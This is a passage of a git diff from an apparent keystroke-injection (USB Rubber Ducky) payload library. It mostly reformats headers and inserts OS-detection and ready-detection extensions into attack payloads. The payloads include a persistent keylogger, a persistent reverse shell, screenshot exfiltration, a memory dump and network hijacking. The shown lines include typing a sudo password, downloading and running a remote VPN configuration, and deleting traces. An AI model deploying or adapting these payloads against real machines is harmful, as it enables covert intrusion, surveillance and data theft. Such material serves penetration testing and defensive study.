+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
index 50149ba2d..8c6bccdf9 100644
--- a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ########################################################
-REM # #
-REM # Title : Persistent Keylogger - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ########################################################
+REM_BLOCK
+########################################################
+# #
+# Title : Persistent Keylogger - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
index 1ce309688..36ef49466 100644
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Persistent Reverse Shell - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Persistent Reverse Shell - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
index c2dd218f1..457de69e7 100644
--- a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
+++ b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
@@ -1,13 +1,14 @@
-REM ########################################################
-REM # |
-REM # Title : Send Email Through Thunderbird |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 - Linux(debian tested) |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Send Email Through Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 - Linux(debian tested) #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
index 0e82f52f2..831f1d0c3 100644
--- a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
+++ b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
@@ -1,22 +1,64 @@
-REM ############################################################
-REM # |
-REM # Title : Send Messages In Discord Channel-Server |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
-
+REM_BLOCK
+############################################################
+# #
+# Title : Send Messages In Discord Channel-Server #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
-
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Discord app
GUI
diff --git a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
index 1cd871801..f29cf0853 100644
--- a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
+++ b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
@@ -1,13 +1,14 @@
-
-REM ####################################
-REM # |
-REM # Title : Set Arbitrary VPN |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Set Arbitrary VPN #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+####################################
+END_REM
REM Requirements:
REM - Permissions
@@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
-DEFINE VPN_FILE_LINK example.com
+DEFINE #VPN_FILE_LINK example.com
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 1000
-STRING SUDO_PASS
-ENTER
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### VPN SECTION ####
-
-
-STRING curl
-STRING VPN_FILE_LINK
-STRING > vpn_configuration.ovpn
-ENTER
+STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
REM It depends by the internet connection
DELAY 2000
-STRING openvpn vpn_configuration.ovpn
+STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
diff --git a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
index 1c690de91..3ac350796 100644
--- a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
@@ -1,12 +1,12 @@
REM_BLOCK
################################################################
-# |
-# Title : Set An Arbitrary And Persistent Tor Circuit |
-# Author : Aleff |
-# Version : 1.0 |
-# Category : Execution |
-# Target : Windows 10/11; Linux; |
-# |
+# #
+# Title : Set An Arbitrary And Persistent Tor Circuit #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11; Linux; #
+# #
################################################################
Requirements:
diff --git a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
index 2c29325b2..db55616a7 100644
--- a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Set An Arbitrary DNS (IPv4 version) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Set An Arbitrary DNS (IPv4 version) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Settings
-DELAY 1000
GUI
DELAY 1000
STRING settings
diff --git a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
index fca79218b..5718b92e5 100644
--- a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
+++ b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
@@ -1,12 +1,14 @@
-REM ###################################
-REM # |
-REM # Title : Set Tor Bridge |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###################################
+REM_BLOCK
+###################################
+# #
+# Title : Set Tor Bridge #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###################################
+END_REM
REM Requirements:
REM - Tor installed
diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
index 9935c8935..bba88653e 100644
--- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
+++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
@@ -1,17 +1,61 @@
-REM ####################################################################################
-REM # |
-REM # Title : Starting a PowerShell with administrator permissions in Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################################
+REM_BLOCK
+####################################################################################
+# #
+# Title : Starting a PowerShell with administrator permissions in Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+####################################################################################
+END_REM
REM Requirements:
REM - Nothing
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
index dbdc29d06..178f3b1e5 100644
--- a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
+++ b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
@@ -1,28 +1,68 @@
-
-REM #####################################################
-REM # |
-REM # Title : Stop A Single Process In Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #####################################################
-
+REM_BLOCK
+#####################################################
+# #
+# Title : Stop A Single Process In Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Task Manager
GUI
DELAY 1000
-STRING Task Manager
-ENTER
+STRINGLN Task Manager
DELAY 1000
REM Goto search bar
@@ -36,9 +76,7 @@ TAB
DELAY 500
REM Write the process name
-STRING PROCESS_NAME
-DELAY 500
-ENTER
+STRINGLN PROCESS_NAME
DELAY 500
TAB
DELAY 500
diff --git a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
index 0d4958d2a..b3738e80d 100644
--- a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
+++ b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
@@ -1,12 +1,14 @@
-REM #######################################################
-REM # |
-REM # Title : Telegram Persistent Connection Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Telegram Persistent Connection Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt
index 9006fbaec..9beced90c 100644
--- a/payloads/library/execution/UninstallSignal/payload.txt
+++ b/payloads/library/execution/UninstallSignal/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################
-REM # |
-REM # Title : Uninstall Signal |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################
+REM_BLOCK
+#####################################
+# #
+# Title : Uninstall Signal #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################
+END_REM
REM Plug-And-Play <3
@@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
index 826bc0c7d..60bb2ac12 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
@@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
Github
-
-
-
-
-
Instagram
- |
-
Discord
+
Linkedin
|
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
index 67f6dbd4e..07366cfd9 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
@@ -1,12 +1,14 @@
-REM ##############################################################################
-REM # |
-REM # Title : Uninstall A Specific App On Windows Through Control Panel |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##############################################################################
+REM_BLOCK
+##############################################################################
+# #
+# Title : Uninstall A Specific App On Windows Through Control Panel #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##############################################################################
+END_REM
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
-STRING explorer
-ENTER
+STRINGLN explorer
DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page
diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
index 63282c8a4..d7c5910bd 100644
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@@ -1,18 +1,18 @@
-REM ########################################################
-REM # #
-REM # Title : Dump Windows Memory Through ProcDump #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Exfiltration #
-REM # Target : Windows #
-REM # #
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Dump Windows Memory Through ProcDump #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Authorization to execute powershell commands
-
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
diff --git a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
index 05ee6f0e2..6f6e6f63c 100644
--- a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
@@ -1,13 +1,12 @@
-REM ###################################################
-REM # |
-REM # Title : Exfiltrate Computer Screenshots |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltrate |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################
-
+###################################################
+# #
+# Title : Exfiltrate Computer Screenshots #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltrate #
+# Target : Windows 10-11 #
+# #
+###################################################
REM Requirements:
REM - Internet Connection
@@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
-
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
